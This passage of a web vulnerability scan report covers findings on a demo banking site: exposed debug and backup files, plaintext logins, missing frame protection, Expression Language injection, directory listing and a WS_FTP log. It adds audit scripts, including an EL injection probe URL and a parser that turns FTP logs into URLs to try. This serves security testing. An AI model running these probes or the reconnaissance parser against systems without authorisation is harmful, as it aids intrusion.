Web Server Misconfiguration: Unprotected File ( 1368 )


Summary
The file debug.txt was located. This type of file is usually left by a developer or web master to test a certain function of the
web application or web server. Leaving test scripts available on the server is a very insecure practice. The types of
information that can be gleaned from test scripts include fixed authentication session IDs, usernames and passwords,
locations or pointers to confidential areas of the web site, and proprietary source code. With this type of information available
to an attacker, they can either use it to totally breach the security of the site or use it as a stepping stone to retrieve other
sensitive data. Recommendations include removing this file from the production server.

Fix
For Security Operations:
Remove the file from the server. Inform developers and administrators to remove test files and applications from servers when
they are no longer needed. While they are in use, protect them with authentication and restrict them to trusted addresses; if
HTTP basic authentication is used, serve it only over HTTPS, since basic credentials are merely base64-encoded.
For Development:
Contact your security or network operations team and request they investigate the issue.
For QA:
Contact your security or network operations team and request they investigate the issue.

Reference

Classifications

CWE-284: Access Control (Authorization) Issues
http://cwe.mitre.org/data/definitions/284.html
CWE-200: Information Exposure
http://cwe.mitre.org/data/definitions/200.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Web Server Misconfiguration: Unprotected File ( 2083 )


Summary
WebInspect has detected a backup file, found by replacing the file extension with .old, on the target server. The severity of the
threat posed by a web-accessible backup file depends on the sensitivity of the information stored in the original document. From
such files an attacker can gain sensitive information about the site architecture, database and network access credentials,
encryption keys, and so forth, and can use it to craft precise targeted attacks, which may not otherwise be feasible, against the
application.

Execution
Browse to http://zero.webappsecurity.com:80/index.old and inspect the content. The response should return HTTP status
code 200 and should not match the target site's file-not-found response.

Implication
An attacker can use the information obtained from the backup file of a sensitive document to craft a precise targeted attack
against the web application. Such attacks can include, but are not limited to, SQL injection, remote file system access to
overwrite or inject malware, and database manipulation.

Fix
Webroot Security Policy: Implement a security policy that prohibits storage of backup files in webroot.
Temporary Files: Many tools and editors automatically create temporary files or backup files in the webroot. Be careful
when editing files on a production server to avoid inadvertently leaving a backup or temporary copy of the file(s) in the
webroot.
Default Installations: Often, a lot of unnecessary files and folders are installed by default. For instance, IIS installations
include demo applications. Be sure to remove any files or folders that are not required for application to work properly.
Development Backup: Source code backups should not be stored and left available in the webroot.

Further QA can include test cases to look for the presence of backup files in the webroot to ensure none are left in publicly
accessible folders of the web application.

Reference
OWASP - Review Old, Backup and Unreferenced Files for Sensitive Information (OTG-CONFIG-004)
CWE - 200 Information Exposure

Classifications

CWE-200: Information Exposure
http://cwe.mitre.org/data/definitions/200.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Insecure Transport ( 4722 )


Summary
Any area of a web application that possibly contains sensitive information or access to privileged functionality such as remote
site administration functionality should utilize SSL or another form of encryption to prevent login information from being
sniffed or otherwise intercepted or stolen. http://zero.webappsecurity.com:80/login.html has failed this policy.
Recommendations include ensuring that sensitive areas of your web application have proper encryption protocols in place to
prevent login information and other data that could be helpful to an attacker from being intercepted.

Implication
An attacker positioned on the network path (for example on the same wireless network, at a compromised proxy, or anywhere
between the client and the server) can read the submitted credentials and session data as they pass, and would be able to use
them to escalate the attack, possibly leading to impersonation of a legitimate user, the theft of proprietary data, or execution
of actions not intended by the application developers.

Fix
For Security Operations:
Ensure that sensitive areas of your web application have proper encryption protocols in place to prevent login information and
other data that could be helpful to an attacker from being intercepted.
For Development:
Ensure that sensitive areas of your web application have proper encryption protocols in place to prevent login information and
other data that could be helpful to an attacker from being intercepted.
For QA:
Test the application not only from the perspective of a normal user, but also from the perspective of a malicious one.

Reference

Classifications

CWE-287: Improper Authentication
http://cwe.mitre.org/data/definitions/287.html
Kingdom: Security Features
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Web Server Misconfiguration: HTTP Basic Authentication ( 10512 )


Summary
Any area of a web application that possibly contains sensitive information or access to privileged functionality such as remote
site administration functionality should utilize SSL or another form of encryption to prevent login information from being
sniffed or otherwise intercepted or stolen. http://zero.webappsecurity.com:80/manager/html has failed this policy: it challenges
for HTTP Basic Authentication over plain HTTP, and Basic credentials are only base64-encoded, not encrypted, and are re-sent
with every request to the protected area.
Recommendations include ensuring that sensitive areas of your web application have proper encryption protocols in place to
prevent login information and other data that could be helpful to an attacker from being intercepted.

Implication
An attacker positioned on the network path (for example on the same wireless network, at a compromised proxy, or anywhere
between the client and the server) can read the submitted credentials and session data as they pass, and would be able to use
them to escalate the attack, possibly leading to impersonation of a legitimate user, the theft of proprietary data, or execution
of actions not intended by the application developers.

Fix
For Security Operations:
Ensure that sensitive areas of your web application have proper encryption protocols in place to prevent login information and
other data that could be helpful to an attacker from being intercepted.
For Development:
Ensure that sensitive areas of your web application have proper encryption protocols in place to prevent login information and
other data that could be helpful to an attacker from being intercepted.
For QA:
Test the application not only from the perspective of a normal user, but also from the perspective of a malicious one.

Reference

Classifications

CWE-287: Improper Authentication
http://cwe.mitre.org/data/definitions/287.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Often Misused: Login ( 10595 )


Summary
An unencrypted login form has been discovered. Any area of a web application that possibly contains sensitive information or
access to privileged functionality such as remote site administration functionality should utilize SSL or another form of
encryption to prevent login information from being sniffed or otherwise intercepted or stolen. If the login form is being served
over SSL, the page that the form is being submitted to MUST be accessed over SSL. Every link/URL present on that page (not
just the form action) needs to be served over HTTPS. This will prevent Man-in-the-Middle attacks on the login form.
Recommendations include ensuring that sensitive areas of your web application have proper encryption protocols in place to
prevent login information and other data that could be helpful to an attacker from being intercepted.
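The following script, added here as an example and not part of the WebInspect check, applies the rule stated above to a saved page: it parses the HTML, finds every form that contains a password field, and reports when the page or the form's resolved action is not HTTPS, or when an HTTPS login page still references an http:// link or resource. The three sample pages are constructed for the example; the report does not reproduce the real login markup of this host.

```python
# Added check (not WebInspect's): flag login forms that are served over plain HTTP,
# that submit credentials to a non-HTTPS action, or that sit on an HTTPS page which
# still pulls http:// resources. The sample pages below are constructed.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormScanner(HTMLParser):
    """Collect every form (and whether it holds a password field) plus every href/src."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.links = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True
        for key in ("href", "src"):
            if a.get(key):
                self.links.append(a[key])

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_login_page(page_url, body):
    """Return a list of findings for one page; an empty list means it passes this policy."""
    scanner = _FormScanner()
    scanner.feed(body)
    findings = []
    page_scheme = urlsplit(page_url).scheme
    login_forms = [f for f in scanner.forms if f["has_password"]]
    for form in login_forms:
        # An empty action submits back to the page itself, so resolve relative to page_url.
        target = urljoin(page_url, form["action"])
        if page_scheme != "https":
            findings.append("login form served over %s: %s" % (page_scheme, page_url))
        if urlsplit(target).scheme != "https":
            findings.append("credentials submitted over %s: %s"
                            % (urlsplit(target).scheme, target))
    # On an HTTPS login page every link and resource must also be HTTPS, or an active
    # attacker can inject script through the plaintext resource and read the form.
    if login_forms and page_scheme == "https":
        for link in scanner.links:
            absolute = urljoin(page_url, link)
            if urlsplit(absolute).scheme == "http":
                findings.append("http resource on login page: %s" % absolute)
    return findings


# Constructed samples (the report does not reproduce the real login.html markup).
HTTP_LOGIN = (
    '<form action="/login" method="post">'
    '<input name="username"><input type="password" name="password"></form>'
)
HTTPS_MIXED = (
    '<script src="http://example.test/js/app.js"></script>'
    '<form action="https://example.test/auth" method="post">'
    '<input type="password" name="password"></form>'
)
HTTPS_CLEAN = (
    '<form action="" method="post"><input type="password" name="password"></form>'
    '<a href="/help">Help</a>'
)

if __name__ == "__main__":
    for url, page in (("http://zero.webappsecurity.com/login.html", HTTP_LOGIN),
                      ("https://example.test/login", HTTPS_MIXED),
                      ("https://example.test/login", HTTPS_CLEAN)):
        print(url, audit_login_page(url, page) or "OK")
```

Run it against the saved response body of each page that carries a password field; an HTTP page yields two findings (served and submitted in the clear), a mixed-content HTTPS page yields one per plaintext resource, and a clean HTTPS page yields none.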

Implication
An attacker who exploited this design vulnerability would be able to utilize the information to escalate their method of attack,
possibly leading to impersonation of a legitimate user, the theft of proprietary data, or execution of actions not intended by
the application developers.

Fix
Ensure that sensitive areas of your web application have proper encryption protocols in place to prevent login information and
other data that could be helpful to an attacker from being intercepted.

Reference
Advisory:http://www.kb.cert.org/vuls/id/466433

Classifications

CWE-287: Improper Authentication


http://cwe.mitre.org/data/definitions/287.html
Kingdom: API Abuse
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Cross-Frame Scripting ( 11293 )


Summary
A Cross-Frame Scripting (XFS) vulnerability can allow an attacker to load the vulnerable application inside an HTML iframe tag
on a malicious page. The attacker could use this weakness to devise a Clickjacking attack to conduct phishing, frame sniffing,
social engineering or Cross-Site Request Forgery attacks.
Clickjacking
The goal of a Clickjacking attack is to deceive the victim user into interacting with UI elements of the attacker's choice on the
target web site without her knowledge, and in turn executing privileged functionality on the victim's behalf. To achieve this
goal, the attacker must exploit the XFS vulnerability to load the attack target inside an iframe tag, hide it using Cascading
Style Sheets (CSS) and overlay the phishing content on the malicious page. By placing the UI elements on the phishing page
so that they overlap with those on the targeted page, the attacker ensures that the victim unknowingly interacts with
UI elements on the target page that are not visible to the victim.
WebInspect has detected a page which potentially handles sensitive information using an HTML form with a password input
field and is missing XFS protection.

This response is not protected by a valid X-Frame-Options header. Furthermore, an effective frame-busting technique was
not observed while loading this page inside a frame.

Execution
Create a test page containing an HTML iframe tag whose src attribute is set to http://zero.webappsecurity.com:80/login.html.
Successful framing of the target page indicates the application's susceptibility to XFS.
Note that WebInspect will report only one instance of this check across each host within the scope of the scan. The other
visible pages on the site may, however, be vulnerable to XFS as well and hence should be protected against it with an
appropriate fix.

Implication
A Cross-Frame Scripting weakness could allow an attacker to embed the vulnerable application inside an iframe. Exploitation
of this weakness could result in:
Hijacking of user events such as keystrokes
Theft of sensitive information
Execution of privileged functionality through combination with Cross-Site Request Forgery attacks

Fix
Browser vendors have introduced and adopted a policy-based mitigation technique using the X-Frame-Options header.
Developers can use this header to instruct the browser about appropriate actions to perform if their site is included inside an
iframe. Developers must set the X-Frame-Options header to one of the following permitted values:
DENY
Deny all attempts to frame the page
SAMEORIGIN
The page can be framed by another page only if it belongs to the same origin as the page being framed
ALLOW-FROM origin
Developers can specify a single trusted origin in the origin attribute. Only pages on that origin are permitted to load this page
inside an iframe. Note that ALLOW-FROM accepts one origin, not a list, was never implemented by Chrome or Safari, and has
since been superseded by the Content-Security-Policy frame-ancestors directive, which does accept a list of origins and is
the preferred control where browser support allows.
Developers must also use client-side frame-busting JavaScript as a protection against XFS. This will enable users of older
browsers that do not support the X-Frame-Options header to also be protected from clickjacking attacks; the Frame Busting
references below describe implementations that resist the known bypasses.
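As an added example (not the tool's own logic), the following function reproduces the header half of this check: given the headers of a captured response, it decides which framing policy a browser would apply. CSP frame-ancestors is checked first because browsers give it precedence over X-Frame-Options; an ALLOW-FROM value is reported but counted as unprotected for the reason given above; values browsers do not recognise (ALLOWALL, misspellings) and conflicting duplicate headers are reported as such. The header sets are constructed, modelled on the headers this host returns in the report.

```python
# Added example (not WebInspect's check): decide from a captured response's headers whether
# a browser would refuse to frame it. Header sets below are constructed.


def _header_values(headers, name):
    """All values of one header, case-insensitive, with comma-joined values split apart."""
    values = []
    for key, value in headers:
        if key.lower() == name.lower():
            values.extend(part.strip() for part in value.split(",") if part.strip())
    return values


def framing_protection(headers):
    """Return (status, detail). status is one of:
    'csp'          Content-Security-Policy frame-ancestors present (takes precedence over XFO)
    'deny' / 'sameorigin' / 'allow-from'   the three X-Frame-Options forms
    'invalid'      an X-Frame-Options value browsers ignore (e.g. ALLOWALL)
    'conflicting'  several X-Frame-Options headers with different values
    'none'         no framing control at all
    """
    for policy in _header_values(headers, "Content-Security-Policy"):
        for directive in policy.split(";"):
            parts = directive.split()
            if parts and parts[0].lower() == "frame-ancestors":
                return "csp", parts[1:]
    xfo = _header_values(headers, "X-Frame-Options")
    if not xfo:
        return "none", "no X-Frame-Options or CSP frame-ancestors header"
    if len({v.upper() for v in xfo}) > 1:
        return "conflicting", xfo
    value = xfo[0]
    upper = value.upper()
    if upper == "DENY":
        return "deny", value
    if upper == "SAMEORIGIN":
        return "sameorigin", value
    if upper.startswith("ALLOW-FROM "):
        return "allow-from", value.split(None, 1)[1]
    return "invalid", value


def is_protected(headers):
    """True only for policies every current browser enforces. ALLOW-FROM is legacy-only
    (Chrome and Safari never implemented it) and an empty or wildcard frame-ancestors
    list is treated conservatively, so both count as unprotected here."""
    status, detail = framing_protection(headers)
    if status == "csp":
        return bool(detail) and "*" not in detail
    return status in ("deny", "sameorigin")


# Constructed to resemble the headers this host returns in the report: no framing control.
SCANNED_LIKE = [
    ("Server", "Apache-Coyote/1.1"),
    ("Content-Type", "text/html;charset=UTF-8"),
    ("Cache-Control", "no-cache, max-age=0, must-revalidate, no-store"),
]

if __name__ == "__main__":
    for label, hdrs in (("scanned page", SCANNED_LIKE),
                        ("fixed page", [("X-Frame-Options", "SAMEORIGIN")]),
                        ("csp page", [("Content-Security-Policy", "frame-ancestors 'self'")])):
        print(label, framing_protection(hdrs), "protected" if is_protected(hdrs) else "UNPROTECTED")
```

Feed it the header list of the login.html response to reproduce the finding; the same function applied to every crawled response covers the other pages the note above says are not reported individually.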


Reference
HP 2012 Cyber Security Report
The X-Frame-Options header - a failure to launch
Server Configuration:
IIS
Apache, nginx
Specification:
X-Frame-Options IETF Draft
OWASP:
Clickjacking
Frame Busting:
Busting Frame Busting: A Study of Clickjacking Vulnerabilities on Popular Sites
OWASP: Busting Frame Busting

Classifications

CWE-352: Cross-Site Request Forgery (CSRF)


http://cwe.mitre.org/data/definitions/352.html
Kingdom: Security Features
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Expression Language Injection ( 11310 )


Summary
WebInspect has detected an Expression Language (EL) injection vulnerability. EL injection vulnerabilities are introduced when
an application fails to sufficiently validate untrusted user data before assigning it to attribute values of certain Spring MVC JSP
tags.
Expression Language allows JSP pages to easily access application data stored in user-defined JavaBeans components as well
as the implicit objects. In addition, JSP pages can also invoke arbitrary public and static methods and perform arithmetic
operations using EL expressions.
By allowing attackers to inject EL expressions through insufficiently validated user input, an application could grant
unauthorized access to sensitive application and server information. Expression Language injection could also let attackers
bypass HTTPOnly access restrictions imposed on cookies by exploiting access to the implicit cookie object made available in
EL expressions.
The affected Spring Framework versions include
3.0.0 to 3.0.5
2.5.0 to 2.5.6.SEC02 (community releases)
2.5.0 to 2.5.7.SR01 (subscription customers)

Execution
Click http://zero.webappsecurity.com:80/search.html?searchTerm=${5914%2b2593} to verify the vulnerability in a web
browser.
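An added example, not WebInspect's logic, of how a tester confirms this finding without relying on a value such as 8507 that could already occur on the page: the probe uses random five-digit operands, URL-encodes the expression so that the + survives the query string, and classifies the response as evaluated, reflected-only, or not-reflected. The response bodies are constructed to mirror what a vulnerable and a patched search page would return for the report's own probe.

```python
# Added example (not WebInspect's check logic): verify the EL injection finding with an
# arithmetic probe whose result cannot plausibly occur in a clean response, then classify
# the response. The response bodies below are constructed.
import html
import random
import re
from urllib.parse import quote


def make_probe(rng=random):
    """Return (expression, expected_result) with five-digit random operands, so a hit on
    the result string is not the coincidence a hit on '7' or '100' could be."""
    a, b = rng.randint(10000, 99999), rng.randint(10000, 99999)
    return "${%d+%d}" % (a, b), str(a + b)


def probe_url(base, param, expression):
    """URL-encode the probe; '+' must become %2B or the server reads it as a space."""
    return "%s?%s=%s" % (base, param, quote(expression, safe=""))


def classify(body, expression, expected):
    """'evaluated'      the sum appears as a standalone number (EL was interpreted)
    'reflected-only'    the literal ${...} came back, HTML-escaped or not (reflection, no EL)
    'not-reflected'     neither appears"""
    if re.search(r"(?<![\d.])%s(?![\d.])" % re.escape(expected), body):
        return "evaluated"
    if expression in body or html.escape(expression) in body:
        return "reflected-only"
    return "not-reflected"


# Constructed responses for the report's own probe ${5914+2593}, whose value is 8507.
VULNERABLE_BODY = "<h2>Search results for: 8507</h2><p>No matches.</p>"
PATCHED_BODY = "<h2>Search results for: ${5914+2593}</h2><p>No matches.</p>"

if __name__ == "__main__":
    expr, want = make_probe(random.Random(2016))
    print(probe_url("http://zero.webappsecurity.com/search.html", "searchTerm", expr),
          "expects", want)
    for body in (VULNERABLE_BODY, PATCHED_BODY):
        print(classify(body, "${5914+2593}", "8507"))
```

A reflected-only result still means the parameter is echoed unencoded and should be looked at under the Cross-Site Scripting finding; only an evaluated result confirms EL interpretation.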

Implication
Expression Language injection vulnerabilities can be used to steal sensitive application information as well as bypass
HTTPOnly cookie access restrictions. The impact depends on the information available within the application's context.

Fix
The vulnerability can be fixed by upgrading to Spring Framework 3.1 or later.
For versions below 3.1 (3.0.6 onwards, 2.5.6.SEC03 onwards and 2.5.7.SR02 onwards), set the springJspExpressionSupport
context parameter to false in web.xml; this stops Spring's JSP tag library from evaluating EL in its tag attributes.

Reference
Vendor:
SpringSource
Advisory:
Expression Language Injection
CVE:
CVE-2011-2730
Expression Language:
Expression Language Specification

Classifications

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
Kingdom: Input Validation and Representation
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Web Server Misconfiguration: Directory Listing ( 746 )


Summary
A serious Directory Listing vulnerability was discovered within your web application. Risks associated with an attacker
discovering a Directory Listing, which is a complete index of all of the resources located in that directory, result from the fact
that files that should remain hidden, such as data files, backed-up source code, or applications in development, may then be
visible. The specific risks depend upon the specific files that are listed and accessible. Recommendations include restricting
access to important directories or files by adopting a "need to know" requirement for both the document and server root, and
turning off features such as Automatic Directory Listings that could expose private files and provide information that could be
utilized by an attacker when formulating or conducting an attack.

Execution
http://zero.webappsecurity.com:80/errors/
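An added example (not part of the report) of what an attacker does with such a listing and what a tester should therefore record: parse the index page, extract the entries as absolute URLs, and flag names that indicate backups, dumps, include files, logs or deployable archives. Both index pages below are constructed in the markup style of Tomcat and of Apache mod_autoindex; the actual contents of /errors/ on this host are not reproduced.

```python
# Added example (not part of the report): pull the file names out of an automatic directory
# index (Tomcat or Apache mod_autoindex markup) and flag the ones that should never be
# web-reachable. Both index pages below are constructed, not the real /errors/ listing.
from html.parser import HTMLParser
from urllib.parse import unquote, urljoin

INDEX_MARKERS = ("Index of /", "Directory Listing For", "Parent Directory")
SENSITIVE_SUFFIXES = (".bak", ".old", ".orig", "~", ".sql", ".inc", ".log",
                      ".zip", ".tar.gz", ".properties", ".war")


class _LinkCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.hrefs.append(href)


def looks_like_index(body):
    """Cheap triage: does the body carry the title/link text the common servers emit?"""
    return any(marker in body for marker in INDEX_MARKERS)


def listed_entries(dir_url, body):
    """Absolute URLs of the entries in an index page, skipping Apache's column-sort links
    ('?C=N;O=D') and the parent-directory link, which resolves outside dir_url."""
    collector = _LinkCollector()
    collector.feed(body)
    entries = []
    for href in collector.hrefs:
        if href.startswith("?"):
            continue
        absolute = urljoin(dir_url, href)
        if absolute.startswith(dir_url) and absolute != dir_url:
            entries.append(absolute)
    return entries


def sensitive_entries(urls):
    """The subset of entries whose names suggest data, backups, includes, logs or archives."""
    return [u for u in urls if unquote(u).lower().endswith(SENSITIVE_SUFFIXES)]


TOMCAT_INDEX = """<html><head><title>Directory Listing For /errors/</title></head><body>
<h1>Directory Listing For /errors/ - <a href="/"><b>Up To /</b></a></h1>
<table><tr><td><a href="/errors/404.html"><tt>404.html</tt></a></td></tr>
<tr><td><a href="/errors/500.html"><tt>500.html</tt></a></td></tr>
<tr><td><a href="/errors/errors.sql.bak"><tt>errors.sql.bak</tt></a></td></tr></table>
</body></html>"""

APACHE_INDEX = """<html><head><title>Index of /backup</title></head><body><h1>Index of /backup</h1>
<a href="?C=N;O=D">Name</a> <a href="?C=M;O=A">Last modified</a>
<a href="/">Parent Directory</a>
<a href="site.tar.gz">site.tar.gz</a>
<a href="notes.txt">notes.txt</a>
</body></html>"""

if __name__ == "__main__":
    for url, page in (("http://zero.webappsecurity.com/errors/", TOMCAT_INDEX),
                      ("http://example.test/backup/", APACHE_INDEX)):
        found = listed_entries(url, page)
        print(url, "index" if looks_like_index(page) else "not an index", found,
              "SENSITIVE:", sensitive_entries(found))
```

Turning the listing off is a server setting rather than application code: for Apache httpd, Options -Indexes in the directory's configuration or .htaccess; for Tomcat, the listings init-param of the DefaultServlet in conf/web.xml set to false.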

Implication
Risks associated with an attacker discovering a Directory Listing on your application server depend upon what type of
directory is discovered, and what types of files are contained within it. The primary threat from an accessible Directory Listing
is that hidden files such as data files, source code, or applications under development will then be visible to a potential
attacker. In addition to accessing files containing sensitive information, other risks include an attacker utilizing the information
discovered in that directory to perform other types of attacks.


Fix
For Development:
Unless you are actively involved with implementing the web application server, there is not a wide range of available solutions to
prevent problems that can occur from an attacker finding a Directory Listing. Primarily, this problem will be resolved by the
web application server administrator. However, there are certain actions you can take that will help to secure your web
application.

Restrict access to important files or directories only to those who actually need it.
Ensure that files containing sensitive information are not left publicly accessible, or that comments left inside files do not
reveal the locations of directories best left confidential.
For Security Operations:

One of the most important aspects of web application security is to restrict access to important files or directories only to
those individuals who actually need to access them. Ensure that the private architectural structure of your web application is
not exposed to anyone who wishes to view it as even seemingly innocuous directories can provide important information to a
potential attacker.

The following recommendations can help to ensure that you are not unintentionally allowing access to either information that
could be utilized in conducting an attack or proprietary data stored in publicly accessible directories.

Turn off the Automatic Directory Listing feature in whatever application server package that you utilize.
Restrict access to important files or directories only to those who actually need it.
Ensure that files containing sensitive information are not left publicly accessible.
Don't follow standard naming procedures for hidden directories. For example, don't create a hidden directory called "cgi"
that contains cgi scripts. Obvious directory names are just that...readily guessed by an attacker.

Remember, the harder you make it for an attacker to access information about your web application, the more likely it is that
he will simply find an easier target.

For QA:

For reasons of security, it is important to test the web application not only from the perspective of a normal user, but also
from that of a malicious one. Whenever possible, adopt the mindset of an attacker when testing your web application for
security defects. Access your web application from outside your firewall or IDS. Utilize Google or another search engine to
ensure that searches for vulnerable files do not return information regarding your web application. For example, an
attacker will utilize a search engine, and search for directory listings such as the following: "index of / cgi-bin". Make sure that
your directory structure is not obvious, and that only files that are necessary are capable of being accessed.

Reference
Apache:
Security Tips for Server Configuration
Protecting Confidential Documents at Your Site
Securing Apache - Access Control
IIS:
Implementing NTFS Standard Permissions on Your Web Site
Netscape:
Controlling Access to Your Server
General:
Password-protecting web pages
Web Security


Classifications

CWE-548: Information Leak Through Directory Listing


http://cwe.mitre.org/data/definitions/548.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Web Server Misconfiguration: Unprotected File ( 764 )


Summary
A serious WS_FTP vulnerability was identified within your web application. WS_FTP is a popular FTP client for Windows which
is used by system administrators and developers to upload and download files from web servers; by default each transfer is
recorded in a log file. Risks associated with an attacker discovering a WS_FTP log file result from the fact that files that
should remain hidden, such as administrative or maintenance applications, web application configuration files, or application
data files, may then be visible. Recommendations include removing the WS_FTP log file from the application server and
configuring WS_FTP so that it does not create log files.

Execution
Click the following link to examine the contents of the WS_FTP log file discovered on your web application server.

http://zero.webappsecurity.com:80/admin/WS_FTP.LOG

Implication
When WS_FTP is used to transfer files, a log file called 'ws_ftp.log' is written into the local directory being transferred and is
commonly uploaded to the server along with the directory's contents. This log file contains records of every file that is
accessed by WS_FTP, which could possibly contain very valuable information to an attacker because it may list files that are
otherwise "hidden." This often includes administrative or maintenance applications, web application configuration files,
applications-in-development, backed-up application source code and possible application data files. Primarily, WS_FTP log
files are valuable to attackers because they display all files in a directory, not just ones that are intended to be used. How
easy is it for an attacker to take advantage of an insecure web application via the discovery of a WS_FTP log file on your web
application server? Often, this is as simple as typing in the name of the file garnered directly from the WS_FTP log file. In
essence, gaining access to a WS_FTP log file greatly reduces the amount of effort a potential attacker must employ to gain
knowledge of your web application.
A fundamental necessity for a successful attack upon your web application is reconnaissance. An attacker will employ a variety
of methods, including malicious scanning agents and Google searches, to find out as much information about your web
application as possible. That information can then be utilized when the attacker is formulating his next method of attack. An
attacker who finds a WS_FTP log file has had a large portion of his reconnaissance conducted for him.
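An added example (not WebInspect's logic) of the reconnaissance value just described: parse a recovered WS_FTP.LOG and turn the remote paths into the URLs to try. The line layout assumed is the classic WS_FTP client format (date, time, transfer mode, local path, an arrow giving direction, host, remote directory, remote file name); the log content itself is constructed, since the report does not reproduce the real file.

```python
# Added example (not WebInspect's logic): turn a recovered WS_FTP.LOG into the list of URLs
# an attacker would try next. Assumed line layout (classic WS_FTP client logs):
#   date time mode local-path --> host remote-dir remote-name     (--> upload, <-- download)
# The log below is constructed; the real file's contents are not reproduced in the report.
import re

LINE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<mode>[AB]) (?P<local>.+?) "
    r"(?P<arrow>-->|<--) (?P<host>\S+) (?P<rdir>\S+) (?P<name>\S+)$"
)


def parse_ws_ftp_log(text):
    """One dict per parsable transfer line; unknown lines are skipped rather than failing."""
    records = []
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["direction"] = "upload" if rec["arrow"] == "-->" else "download"
        rec["remote_path"] = rec["rdir"].rstrip("/") + "/" + rec["name"]
        records.append(rec)
    return records


def candidate_urls(records, docroot, base_url):
    """Map remote paths under the web document root onto site URLs, deduplicated, in order.
    Paths outside docroot (e.g. a DB dump pulled from a home directory) are not reachable
    over HTTP and are left out."""
    prefix = docroot.rstrip("/") + "/"
    urls = []
    for rec in records:
        if rec["remote_path"].startswith(prefix):
            url = base_url.rstrip("/") + "/" + rec["remote_path"][len(prefix):]
            if url not in urls:
                urls.append(url)
    return urls


SAMPLE_LOG = r"""2016.09.30 11:02 B C:\site\index.html --> 203.0.113.10 /var/www/html index.html
2016.09.30 11:03 A C:\site\admin\users.sql --> 203.0.113.10 /var/www/html/admin users.sql
2016.09.30 11:03 B C:\site\admin\config.php.bak --> 203.0.113.10 /var/www/html/admin config.php.bak
2016.09.30 11:05 B C:\site\dev\app.war <-- 203.0.113.10 /var/www/html/dev app.war
2016.09.30 11:06 B C:\backup\db.sql <-- 203.0.113.10 /home/deploy db.sql
2016.09.30 11:07 B C:\site\index.html --> 203.0.113.10 /var/www/html index.html
"""

if __name__ == "__main__":
    recs = parse_ws_ftp_log(SAMPLE_LOG)
    for url in candidate_urls(recs, "/var/www/html", "http://zero.webappsecurity.com"):
        print(url)
```

The document root is the one assumption the tester has to supply; the remote directory column of the log usually makes it obvious, and a single request to the first candidate confirms it.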

Fix
For Development:
Unless you are actively involved with implementing the web application server, there is not a wide range of available solutions
to prevent problems that can occur from an attacker finding a WS_FTP log file. Primarily, this problem will be resolved by the
web application server administrator. However, there are certain actions you can take that will help to secure your web
application.
Restrict access to important files or directories only to those who actually need it.
Ensure that files containing sensitive information are not left publicly accessible, or that comments left inside files do not
reveal the locations of directories best left confidential.
For Security Operations:
There are two primary actions to take to eliminate the risk of a WS_FTP log file vulnerability.


Manually remove the WS_FTP log file from the application server.
Configure WS_FTP so that it does not create log files on servers.
One of the most important aspects of web application security is to restrict access to important files or directories only to
those individuals who actually need to access them. Ensure that the private architectural structure of your web application is
not exposed to anyone who wishes to view it as even seemingly innocuous directories can provide important information to a
potential attacker.

The following recommendations can help to ensure that you are not unintentionally allowing access to either information that
could be utilized in conducting an attack or proprietary data stored in publicly accessible directories.

Ensure that files containing sensitive information are not left publicly accessible, or that comments left inside files do not
reveal the locations of directories best left confidential.
Restrict access to important files or directories only to those who actually need it.
Don't follow standard naming procedures for hidden directories. For example, don't create a hidden directory called "cgi"
that contains cgi scripts. Obvious directory names are just that...readily guessed by an attacker.
Remember, the harder you make it for an attacker to access information about your web application, the more likely it is that
he will simply find an easier target.

For QA:
For reasons of security, it is important to test the web application not only from the perspective of a normal user, but also
from that of a malicious one. Whenever possible, adopt the mindset of an attacker when testing your web application for
security defects. Access your web application from outside your firewall or IDS. Utilize Google or another search engine to
ensure that searches for vulnerable files do not return information regarding your web application. For example, an
attacker will utilize a search engine, and search for directory listings such as the following: "index of / cgi-bin". Make sure that
your directory structure is not obvious, and that only files that are necessary are capable of being accessed.

Reference
IIS:
Microsoft IIS FTP Information
General:
Password-protecting web pages
Web Security
FTP Clients

Classifications

CWE-284: Access Control (Authorization) Issues


http://cwe.mitre.org/data/definitions/284.html
CWE-200: Information Exposure
http://cwe.mitre.org/data/definitions/200.html
Kingdom: Environment
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html

Cross-Site Scripting: Reflected ( 10044 )


Summary
HTML tag injection vulnerabilities were identified on this web application. HTML tag injections are used to aid in Cross-Site
Request Forgeries and phishing attacks against third-party web sites, and can often double as Cross-Site Scripting
vulnerabilities. Recommendations include implementing secure programming techniques that ensure proper filtration of
user-supplied data, and encoding all user-supplied data to prevent inserted scripts being sent to end users in a format that can be
executed.

Execution
If the session is vulnerable to a HTML Tag Injection attack, the same HTML sent in the request will also appear as part of the
response. View the attack string included with the request to check what to search for in the response. This indicates that the
web application is taking values from the HTTP request parameters and using them in the HTTP response without first
removing potentially malicious HTML.

Implication
HTML tag injection often has implications that are identical to Cross-Site Scripting, and can generally be subdivided into two
categories: stored and reflected attacks. The main difference between the two is in how the payload arrives at the server.
Stored attacks are just that...in some form stored on the target server, such as in a database, or via a submission to a bulletin
board or visitor log. The victim will retrieve and execute the attack code in his browser when a request is made for the stored
information. Reflected attacks, on the other hand, come from somewhere else. This happens when user input from a web
